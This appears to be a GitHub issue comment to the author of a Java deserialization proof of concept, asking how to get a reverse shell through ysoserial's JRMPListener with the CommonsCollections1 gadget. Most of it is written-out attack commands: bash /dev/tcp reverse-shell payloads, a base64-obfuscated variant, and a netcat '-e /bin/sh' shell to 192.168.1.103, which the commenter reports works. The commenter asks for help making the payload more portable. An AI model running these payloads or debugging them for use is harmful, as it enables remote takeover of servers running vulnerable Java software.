Hi @pyn3rd !
Very nice and easy PoC shared with the community, thanks a lot for this :) I was wondering if you could help me with the right syntax to obtain the reverse shell. I can exec simple commands no problem, but when I try to get a reverse shell with the JRMP Listener, it seems like my syntax isn't going through...
Here's what I've tried so far:
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 "'/bin/bash -i > /dev/tcp/192.168.1.103/1087 0>&1 2>&1" = FAILED
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 "bash -c 'echo L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4xLjEwMy8xMDg3IDA+JjEgMj4mMQ==|base64 -d|bash -i'" = FAILED
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 "echo L2Jpbi9iYXNoIC1pID4gL2Rldi90Y3AvMTkyLjE2OC4xLjEwMy8xMDg3IDA+JjEgMj4mMQ==|base64 -d|bash -i" = FAILED
java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections1 'nc 192.168.1.103 1087 -e /bin/sh' == OK, but this isn't the right way to do it since not all might have "nc" installed
Your help would be very appreciated,
Thanks